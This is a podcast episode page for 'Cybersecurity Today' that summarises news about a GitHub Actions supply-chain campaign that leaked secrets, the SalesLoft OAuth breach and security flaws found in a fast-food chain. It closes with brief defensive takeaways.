Cybersecurity Today Hackers Say Thanks For Lousy Security In Large Fast Food Chain
Sep 8, 2025
Delve into the alarming world of cybersecurity threats, featuring a major GitHub supply chain attack that leaked thousands of secrets. Discover the repercussions of the SalesLoft breach impacting key security firms and the troubling potential of AI vulnerabilities. Ethical hackers expose critical security flaws in a well-known fast-food chain, including hard-coded passwords and unauthorized recordings of customer interactions. The discussion underscores the urgent need for improved security in both software and restaurant tech.
AI Snips
Chapters
Transcript
Episode notes
Supply Chain Targets Move Upstream
- The Ghost Action Campaign implanted malicious GitHub Actions to exfiltrate over 3,300 secrets from developer repos.
- The attack shows build tools and workflows are now prime targets across the software supply chain.
Harden SaaS Integrations And Employee Vigilance
- Monitor and harden third-party SaaS integrations and OAuth activity to limit lateral damage from CRM breaches.
- Train employees to be skeptical of unexpected requests and tighten identity verification with vendors.
From Code Repos To Customer Data
- Attackers used GitHub access and OAuth token theft to pivot from developer repos to customer data across SaaS ecosystems.
- Stolen CRM support tickets even contained API tokens and passwords, widening the fallout beyond contact lists.